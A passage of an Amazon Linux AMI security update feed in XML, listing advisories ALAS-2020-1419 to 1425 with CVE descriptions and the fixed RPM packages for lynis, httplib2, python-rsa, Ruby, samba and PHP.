arch="noarch"><filename>Packages/httpd24-manual-2.4.46-1.90.amzn1.noarch.rpm</filename></package><package name="mod24_proxy_html" version="2.4.46" release="1.90.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_proxy_html-2.4.46-1.90.amzn1.x86_64.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.46" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-debuginfo-2.4.46-1.90.amzn1.x86_64.rpm</filename></package><package name="mod24_proxy_html" version="2.4.46" release="1.90.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_proxy_html-2.4.46-1.90.amzn1.i686.rpm</filename></package><package name="httpd24-tools" version="2.4.46" release="1.90.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-tools-2.4.46-1.90.amzn1.i686.rpm</filename></package><package name="httpd24" version="2.4.46" release="1.90.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-2.4.46-1.90.amzn1.i686.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.46" release="1.90.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-debuginfo-2.4.46-1.90.amzn1.i686.rpm</filename></package><package name="mod24_md" version="2.4.46" release="1.90.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_md-2.4.46-1.90.amzn1.i686.rpm</filename></package><package name="mod24_ssl" version="2.4.46" release="1.90.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_ssl-2.4.46-1.90.amzn1.i686.rpm</filename></package><package name="mod24_session" version="2.4.46" release="1.90.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_session-2.4.46-1.90.amzn1.i686.rpm</filename></package><package name="mod24_ldap" version="2.4.46" release="1.90.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_ldap-2.4.46-1.90.amzn1.i686.rpm</filename></package><package name="httpd24-devel" version="2.4.46" release="1.90.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-devel-2.4.46-1.90.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1419</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1419: medium priority package update for lynis</title><issued date="2020-08-26 23:09:00" /><updated date="2020-08-31 20:08:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-13882:
99999:
CVE-2019-13033:
99999:
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13033" title="" id="CVE-2019-13033" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13882" title="" id="CVE-2020-13882" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="lynis" version="3.0.0" release="1.17.amzn1" epoch="0" arch="noarch"><filename>Packages/lynis-3.0.0-1.17.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1420</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1420: medium priority package update for python-httplib2</title><issued date="2020-08-26 23:09:00" /><updated date="2020-08-31 20:09:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-11078:
In httplib2 before version 0.18.0, an attacker controlling unescaped part of uri for `httplib2.Http.request()` could change request headers and body, send additional hidden requests to same server. This vulnerability impacts software that uses httplib2 with uri constructed by string concatenation, as opposed to proper urllib building with escaping. This has been fixed in 0.18.0.
1845937: CVE-2020-11078 python-httplib2: CRLF injection via an attacker controlling unescaped part of uri for httplib2.Http.request function
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11078" title="" id="CVE-2020-11078" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python26-httplib2" version="0.18.1" release="1.13.amzn1" epoch="0" arch="noarch"><filename>Packages/python26-httplib2-0.18.1-1.13.amzn1.noarch.rpm</filename></package><package name="python27-httplib2" version="0.18.1" release="1.13.amzn1" epoch="0" arch="noarch"><filename>Packages/python27-httplib2-0.18.1-1.13.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1421</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1421: medium priority package update for python-rsa</title><issued date="2020-08-26 23:09:00" /><updated date="2020-08-31 20:16:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-13757:
Python-RSA before 4.1 ignores leading '\0' bytes during decryption of ciphertext. This could conceivably have a security-relevant impact, e.g., by helping an attacker to infer that an application uses Python-RSA, or if the length of accepted ciphertext affects application behavior (such as by causing excessive memory allocation).
1848507: CVE-2020-13757 python-rsa: decryption of ciphertext leads to DoS
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13757" title="" id="CVE-2020-13757" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python26-rsa" version="3.4.1" release="1.9.amzn1" epoch="0" arch="noarch"><filename>Packages/python26-rsa-3.4.1-1.9.amzn1.noarch.rpm</filename></package><package name="python27-rsa" version="3.4.1" release="1.9.amzn1" epoch="0" arch="noarch"><filename>Packages/python27-rsa-3.4.1-1.9.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1422</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1422: important priority package update for ruby24</title><issued date="2020-08-26 23:09:00" /><updated date="2020-08-31 20:17:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-10663:
The JSON gem through 2.2.0 for Ruby, as used in Ruby 2.4 through 2.4.9, 2.5 through 2.5.7, and 2.6 through 2.6.5, has an Unsafe Object Creation Vulnerability. This is quite similar to CVE-2013-0269, but does not rely on poor garbage-collection behavior within Ruby. Specifically, use of JSON parsing methods can lead to creation of a malicious object within the interpreter, with adverse effects that are application-dependent.
1827500: CVE-2020-10663 rubygem-json: Unsafe Object Creation Vulnerability in JSON
CVE-2019-16255:
Ruby through 2.4.7, 2.5.x through 2.5.6, and 2.6.x through 2.6.4 allows code injection if the first argument (aka the "command" argument) to Shell#[] or Shell#test in lib/shell.rb is untrusted data. An attacker can exploit this to call an arbitrary Ruby method.
1793683: CVE-2019-16255 ruby: Code injection via command argument of Shell#test / Shell#[]
CVE-2019-16254:
Ruby through 2.4.7, 2.5.x through 2.5.6, and 2.6.x through 2.6.4 allows HTTP Response Splitting. If a program using WEBrick inserts untrusted input into the response header, an attacker can exploit it to insert a newline character to split a header, and inject malicious content to deceive clients. NOTE: this issue exists because of an incomplete fix for CVE-2017-17742, which addressed the CRLF vector, but did not address an isolated CR or an isolated LF.
1789556: CVE-2019-16254 ruby: HTTP response splitting in WEBrick (Additional fix)
CVE-2019-16201:
WEBrick::HTTPAuth::DigestAuth in Ruby through 2.4.7, 2.5.x through 2.5.6, and 2.6.x through 2.6.4 has a regular expression Denial of Service cause by looping/backtracking. A victim must expose a WEBrick server that uses DigestAuth to the Internet or a untrusted network.
1773728: CVE-2019-16201 ruby: regular expression denial of service vulnerability of WEBrick's Digest access authentication
CVE-2019-15845:
Ruby through 2.4.7, 2.5.x through 2.5.6, and 2.6.x through 2.6.4 mishandles path checking within File.fnmatch functions.
1789407: CVE-2019-15845 ruby: NUL injection vulnerability of File.fnmatch and File.fnmatch?
CVE-2015-9251:
jQuery before 3.0.0 is vulnerable to Cross-site Scripting (XSS) attacks when a cross-domain Ajax request is performed without the dataType option, causing text/javascript responses to be executed.
1399546: CVE-2015-9251 js-jquery: Cross-site scripting via cross-domain ajax requests
CVE-2012-6708:
jQuery before 1.9.0 is vulnerable to Cross-site Scripting (XSS) attacks. The jQuery(strInput) function does not differentiate selectors from HTML in a reliable fashion. In vulnerable versions, jQuery determined whether the input was HTML by looking for the '<' character anywhere in the string, giving attackers more flexibility when attempting to construct a malicious payload. In fixed versions, jQuery only deems the input to be HTML if it explicitly starts with the '<' character, limiting exploitability only to attackers who can control the beginning of a string, which is far less common.
1591840: CVE-2012-6708 js-jquery: XSS via improper selector detection
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6708" title="" id="CVE-2012-6708" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-9251" title="" id="CVE-2015-9251" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15845" title="" id="CVE-2019-15845" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16201" title="" id="CVE-2019-16201" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16254" title="" id="CVE-2019-16254" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16255" title="" id="CVE-2019-16255" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10663" title="" id="CVE-2020-10663" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="rubygems24" version="2.6.14.4" release="2.12.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems24-2.6.14.4-2.12.amzn1.noarch.rpm</filename></package><package name="ruby24" version="2.4.10" release="2.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby24-2.4.10-2.12.amzn1.x86_64.rpm</filename></package><package name="rubygem24-did_you_mean" version="1.1.0" release="2.12.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem24-did_you_mean-1.1.0-2.12.amzn1.noarch.rpm</filename></package><package name="rubygems24-devel" version="2.6.14.4" release="2.12.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems24-devel-2.6.14.4-2.12.amzn1.noarch.rpm</filename></package><package name="rubygem24-power_assert" version="0.4.1" release="2.12.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem24-power_assert-0.4.1-2.12.amzn1.noarch.rpm</filename></package><package name="rubygem24-bigdecimal" version="1.3.2" release="2.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-bigdecimal-1.3.2-2.12.amzn1.x86_64.rpm</filename></package><package name="rubygem24-json" version="2.0.4" release="2.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-json-2.0.4-2.12.amzn1.x86_64.rpm</filename></package><package name="ruby24-devel" version="2.4.10" release="2.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby24-devel-2.4.10-2.12.amzn1.x86_64.rpm</filename></package><package name="rubygem24-rdoc" version="5.0.1" release="2.12.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem24-rdoc-5.0.1-2.12.amzn1.noarch.rpm</filename></package><package name="rubygem24-minitest5" version="5.10.1" release="2.12.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem24-minitest5-5.10.1-2.12.amzn1.noarch.rpm</filename></package><package name="ruby24-libs" version="2.4.10" release="2.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby24-libs-2.4.10-2.12.amzn1.x86_64.rpm</filename></package><package name="rubygem24-xmlrpc" version="0.2.1" release="2.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-xmlrpc-0.2.1-2.12.amzn1.x86_64.rpm</filename></package><package name="ruby24-irb" version="2.4.10" release="2.12.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby24-irb-2.4.10-2.12.amzn1.noarch.rpm</filename></package><package name="ruby24-debuginfo" version="2.4.10" release="2.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby24-debuginfo-2.4.10-2.12.amzn1.x86_64.rpm</filename></package><package name="rubygem24-psych" version="2.2.2" release="2.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-psych-2.2.2-2.12.amzn1.x86_64.rpm</filename></package><package name="ruby24-doc" version="2.4.10" release="2.12.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby24-doc-2.4.10-2.12.amzn1.noarch.rpm</filename></package><package name="rubygem24-io-console" version="0.4.6" release="2.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-io-console-0.4.6-2.12.amzn1.x86_64.rpm</filename></package><package name="rubygem24-net-telnet" version="0.1.1" release="2.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-net-telnet-0.1.1-2.12.amzn1.x86_64.rpm</filename></package><package name="rubygem24-test-unit" version="3.2.3" release="2.12.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem24-test-unit-3.2.3-2.12.amzn1.noarch.rpm</filename></package><package name="rubygem24-psych" version="2.2.2" release="2.12.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-psych-2.2.2-2.12.amzn1.i686.rpm</filename></package><package name="ruby24-libs" version="2.4.10" release="2.12.amzn1" epoch="0" arch="i686"><filename>Packages/ruby24-libs-2.4.10-2.12.amzn1.i686.rpm</filename></package><package name="rubygem24-bigdecimal" version="1.3.2" release="2.12.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-bigdecimal-1.3.2-2.12.amzn1.i686.rpm</filename></package><package name="ruby24-devel" version="2.4.10" release="2.12.amzn1" epoch="0" arch="i686"><filename>Packages/ruby24-devel-2.4.10-2.12.amzn1.i686.rpm</filename></package><package name="ruby24-debuginfo" version="2.4.10" release="2.12.amzn1" epoch="0" arch="i686"><filename>Packages/ruby24-debuginfo-2.4.10-2.12.amzn1.i686.rpm</filename></package><package name="rubygem24-io-console" version="0.4.6" release="2.12.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-io-console-0.4.6-2.12.amzn1.i686.rpm</filename></package><package name="ruby24" version="2.4.10" release="2.12.amzn1" epoch="0" arch="i686"><filename>Packages/ruby24-2.4.10-2.12.amzn1.i686.rpm</filename></package><package name="rubygem24-xmlrpc" version="0.2.1" release="2.12.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-xmlrpc-0.2.1-2.12.amzn1.i686.rpm</filename></package><package name="rubygem24-net-telnet" version="0.1.1" release="2.12.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-net-telnet-0.1.1-2.12.amzn1.i686.rpm</filename></package><package name="rubygem24-json" version="2.0.4" release="2.12.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-json-2.0.4-2.12.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1423</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1423: medium priority package update for rubygem-json</title><issued date="2020-08-26 23:09:00" /><updated date="2020-08-31 20:20:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-10663:
The JSON gem through 2.2.0 for Ruby, as used in Ruby 2.4 through 2.4.9, 2.5 through 2.5.7, and 2.6 through 2.6.5, has an Unsafe Object Creation Vulnerability. This is quite similar to CVE-2013-0269, but does not rely on poor garbage-collection behavior within Ruby. Specifically, use of JSON parsing methods can lead to creation of a malicious object within the interpreter, with adverse effects that are application-dependent.
1827500: CVE-2020-10663 rubygem-json: Unsafe Object Creation Vulnerability in JSON
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10663" title="" id="CVE-2020-10663" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="rubygem23-json" version="1.8.3" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem23-json-1.8.3-1.53.amzn1.x86_64.rpm</filename></package><package name="rubygem18-json" version="1.8.3" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem18-json-1.8.3-1.53.amzn1.x86_64.rpm</filename></package><package name="rubygem20-json" version="1.8.3" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem20-json-1.8.3-1.53.amzn1.x86_64.rpm</filename></package><package name="rubygem18-json-doc" version="1.8.3" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem18-json-doc-1.8.3-1.53.amzn1.x86_64.rpm</filename></package><package name="rubygem20-json-doc" version="1.8.3" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem20-json-doc-1.8.3-1.53.amzn1.x86_64.rpm</filename></package><package name="rubygem21-json" version="1.8.3" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem21-json-1.8.3-1.53.amzn1.x86_64.rpm</filename></package><package name="rubygem21-json-doc" version="1.8.3" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem21-json-doc-1.8.3-1.53.amzn1.x86_64.rpm</filename></package><package name="rubygem23-json-doc" version="1.8.3" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem23-json-doc-1.8.3-1.53.amzn1.x86_64.rpm</filename></package><package name="rubygem-json-debuginfo" version="1.8.3" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem-json-debuginfo-1.8.3-1.53.amzn1.x86_64.rpm</filename></package><package name="rubygem22-json-doc" version="1.8.3" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem22-json-doc-1.8.3-1.53.amzn1.x86_64.rpm</filename></package><package name="rubygem22-json" version="1.8.3" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem22-json-1.8.3-1.53.amzn1.x86_64.rpm</filename></package><package name="rubygem21-json" version="1.8.3" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem21-json-1.8.3-1.53.amzn1.i686.rpm</filename></package><package name="rubygem20-json" version="1.8.3" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem20-json-1.8.3-1.53.amzn1.i686.rpm</filename></package><package name="rubygem22-json" version="1.8.3" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem22-json-1.8.3-1.53.amzn1.i686.rpm</filename></package><package name="rubygem23-json" version="1.8.3" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem23-json-1.8.3-1.53.amzn1.i686.rpm</filename></package><package name="rubygem-json-debuginfo" version="1.8.3" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem-json-debuginfo-1.8.3-1.53.amzn1.i686.rpm</filename></package><package name="rubygem20-json-doc" version="1.8.3" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem20-json-doc-1.8.3-1.53.amzn1.i686.rpm</filename></package><package name="rubygem23-json-doc" version="1.8.3" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem23-json-doc-1.8.3-1.53.amzn1.i686.rpm</filename></package><package name="rubygem21-json-doc" version="1.8.3" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem21-json-doc-1.8.3-1.53.amzn1.i686.rpm</filename></package><package name="rubygem18-json-doc" version="1.8.3" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem18-json-doc-1.8.3-1.53.amzn1.i686.rpm</filename></package><package name="rubygem22-json-doc" version="1.8.3" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem22-json-doc-1.8.3-1.53.amzn1.i686.rpm</filename></package><package name="rubygem18-json" version="1.8.3" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem18-json-1.8.3-1.53.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1424</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1424: medium priority package update for samba</title><issued date="2020-08-26 23:09:00" /><updated date="2020-08-31 20:21:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-10218:
A flaw was found in the samba client, all samba versions before samba 4.11.2, 4.10.10 and 4.9.15, where a malicious server can supply a pathname to the client with separators. This could allow the client to access files and folders outside of the SMB network pathnames. An attacker could use this vulnerability to create files outside of the current working directory using the privileges of the client user.
1763137: CVE-2019-10218 samba: smb client vulnerable to filenames containing path separators
CVE-2019-10197:
A flaw was found in samba versions 4.9.x up to 4.9.13, samba 4.10.x up to 4.10.8 and samba 4.11.x up to 4.11.0rc3, when certain parameters were set in the samba configuration file. An unauthenticated attacker could use this flaw to escape the shared directory and access the contents of directories outside the share.
1746225: CVE-2019-10197 samba: Combination of parameters and permissions can allow user to escape from the share path definition
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10197" title="" id="CVE-2019-10197" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10218" title="" id="CVE-2019-10218" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="samba-devel" version="4.10.4" release="11.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-devel-4.10.4-11.51.amzn1.x86_64.rpm</filename></package><package name="ctdb" version="4.10.4" release="11.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/ctdb-4.10.4-11.51.amzn1.x86_64.rpm</filename></package><package name="samba-test-libs" version="4.10.4" release="11.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-test-libs-4.10.4-11.51.amzn1.x86_64.rpm</filename></package><package name="samba" version="4.10.4" release="11.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-4.10.4-11.51.amzn1.x86_64.rpm</filename></package><package name="samba-krb5-printing" version="4.10.4" release="11.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-krb5-printing-4.10.4-11.51.amzn1.x86_64.rpm</filename></package><package name="ctdb-tests" version="4.10.4" release="11.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/ctdb-tests-4.10.4-11.51.amzn1.x86_64.rpm</filename></package><package name="samba-test" version="4.10.4" release="11.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-test-4.10.4-11.51.amzn1.x86_64.rpm</filename></package><package name="samba-common" version="4.10.4" release="11.51.amzn1" epoch="0" arch="noarch"><filename>Packages/samba-common-4.10.4-11.51.amzn1.noarch.rpm</filename></package><package name="samba-common-tools" version="4.10.4" release="11.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-common-tools-4.10.4-11.51.amzn1.x86_64.rpm</filename></package><package name="samba-libs" version="4.10.4" release="11.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-libs-4.10.4-11.51.amzn1.x86_64.rpm</filename></package><package name="libsmbclient-devel" version="4.10.4" release="11.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsmbclient-devel-4.10.4-11.51.amzn1.x86_64.rpm</filename></package><package name="samba-winbind-clients" version="4.10.4" release="11.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-clients-4.10.4-11.51.amzn1.x86_64.rpm</filename></package><package name="libwbclient" version="4.10.4" release="11.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwbclient-4.10.4-11.51.amzn1.x86_64.rpm</filename></package><package name="samba-python" version="4.10.4" release="11.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-python-4.10.4-11.51.amzn1.x86_64.rpm</filename></package><package name="samba-debuginfo" version="4.10.4" release="11.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-debuginfo-4.10.4-11.51.amzn1.x86_64.rpm</filename></package><package name="samba-winbind-krb5-locator" version="4.10.4" release="11.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-krb5-locator-4.10.4-11.51.amzn1.x86_64.rpm</filename></package><package name="samba-client-libs" version="4.10.4" release="11.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-client-libs-4.10.4-11.51.amzn1.x86_64.rpm</filename></package><package name="samba-pidl" version="4.10.4" release="11.51.amzn1" epoch="0" arch="noarch"><filename>Packages/samba-pidl-4.10.4-11.51.amzn1.noarch.rpm</filename></package><package name="samba-client" version="4.10.4" release="11.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-client-4.10.4-11.51.amzn1.x86_64.rpm</filename></package><package name="libsmbclient" version="4.10.4" release="11.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsmbclient-4.10.4-11.51.amzn1.x86_64.rpm</filename></package><package name="samba-python-test" version="4.10.4" release="11.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-python-test-4.10.4-11.51.amzn1.x86_64.rpm</filename></package><package name="libwbclient-devel" version="4.10.4" release="11.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwbclient-devel-4.10.4-11.51.amzn1.x86_64.rpm</filename></package><package name="samba-winbind-modules" version="4.10.4" release="11.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-modules-4.10.4-11.51.amzn1.x86_64.rpm</filename></package><package name="samba-common-libs" version="4.10.4" release="11.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-common-libs-4.10.4-11.51.amzn1.x86_64.rpm</filename></package><package name="samba-winbind" version="4.10.4" release="11.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-4.10.4-11.51.amzn1.x86_64.rpm</filename></package><package name="libwbclient-devel" version="4.10.4" release="11.51.amzn1" epoch="0" arch="i686"><filename>Packages/libwbclient-devel-4.10.4-11.51.amzn1.i686.rpm</filename></package><package name="samba-client-libs" version="4.10.4" release="11.51.amzn1" epoch="0" arch="i686"><filename>Packages/samba-client-libs-4.10.4-11.51.amzn1.i686.rpm</filename></package><package name="samba-krb5-printing" version="4.10.4" release="11.51.amzn1" epoch="0" arch="i686"><filename>Packages/samba-krb5-printing-4.10.4-11.51.amzn1.i686.rpm</filename></package><package name="libsmbclient" version="4.10.4" release="11.51.amzn1" epoch="0" arch="i686"><filename>Packages/libsmbclient-4.10.4-11.51.amzn1.i686.rpm</filename></package><package name="samba-winbind-modules" version="4.10.4" release="11.51.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-modules-4.10.4-11.51.amzn1.i686.rpm</filename></package><package name="samba-test-libs" version="4.10.4" release="11.51.amzn1" epoch="0" arch="i686"><filename>Packages/samba-test-libs-4.10.4-11.51.amzn1.i686.rpm</filename></package><package name="libwbclient" version="4.10.4" release="11.51.amzn1" epoch="0" arch="i686"><filename>Packages/libwbclient-4.10.4-11.51.amzn1.i686.rpm</filename></package><package name="samba-common-tools" version="4.10.4" release="11.51.amzn1" epoch="0" arch="i686"><filename>Packages/samba-common-tools-4.10.4-11.51.amzn1.i686.rpm</filename></package><package name="ctdb" version="4.10.4" release="11.51.amzn1" epoch="0" arch="i686"><filename>Packages/ctdb-4.10.4-11.51.amzn1.i686.rpm</filename></package><package name="samba-client" version="4.10.4" release="11.51.amzn1" epoch="0" arch="i686"><filename>Packages/samba-client-4.10.4-11.51.amzn1.i686.rpm</filename></package><package name="samba" version="4.10.4" release="11.51.amzn1" epoch="0" arch="i686"><filename>Packages/samba-4.10.4-11.51.amzn1.i686.rpm</filename></package><package name="samba-debuginfo" version="4.10.4" release="11.51.amzn1" epoch="0" arch="i686"><filename>Packages/samba-debuginfo-4.10.4-11.51.amzn1.i686.rpm</filename></package><package name="libsmbclient-devel" version="4.10.4" release="11.51.amzn1" epoch="0" arch="i686"><filename>Packages/libsmbclient-devel-4.10.4-11.51.amzn1.i686.rpm</filename></package><package name="samba-winbind-krb5-locator" version="4.10.4" release="11.51.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-krb5-locator-4.10.4-11.51.amzn1.i686.rpm</filename></package><package name="samba-libs" version="4.10.4" release="11.51.amzn1" epoch="0" arch="i686"><filename>Packages/samba-libs-4.10.4-11.51.amzn1.i686.rpm</filename></package><package name="samba-python" version="4.10.4" release="11.51.amzn1" epoch="0" arch="i686"><filename>Packages/samba-python-4.10.4-11.51.amzn1.i686.rpm</filename></package><package name="samba-winbind" version="4.10.4" release="11.51.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-4.10.4-11.51.amzn1.i686.rpm</filename></package><package name="samba-test" version="4.10.4" release="11.51.amzn1" epoch="0" arch="i686"><filename>Packages/samba-test-4.10.4-11.51.amzn1.i686.rpm</filename></package><package name="samba-common-libs" version="4.10.4" release="11.51.amzn1" epoch="0" arch="i686"><filename>Packages/samba-common-libs-4.10.4-11.51.amzn1.i686.rpm</filename></package><package name="samba-python-test" version="4.10.4" release="11.51.amzn1" epoch="0" arch="i686"><filename>Packages/samba-python-test-4.10.4-11.51.amzn1.i686.rpm</filename></package><package name="samba-devel" version="4.10.4" release="11.51.amzn1" epoch="0" arch="i686"><filename>Packages/samba-devel-4.10.4-11.51.amzn1.i686.rpm</filename></package><package name="samba-winbind-clients" version="4.10.4" release="11.51.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-clients-4.10.4-11.51.amzn1.i686.rpm</filename></package><package name="ctdb-tests" version="4.10.4" release="11.51.amzn1" epoch="0" arch="i686"><filename>Packages/ctdb-tests-4.10.4-11.51.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1425</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1425: low priority package update for php72 php73</title><issued date="2020-08-26 23:09:00" /><updated date="2020-08-31 20:58:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-7068:
No description is available for this CVE.
1868109: CVE-2020-7068 php: Use of freed hash key in the phar_parse_zipfile function
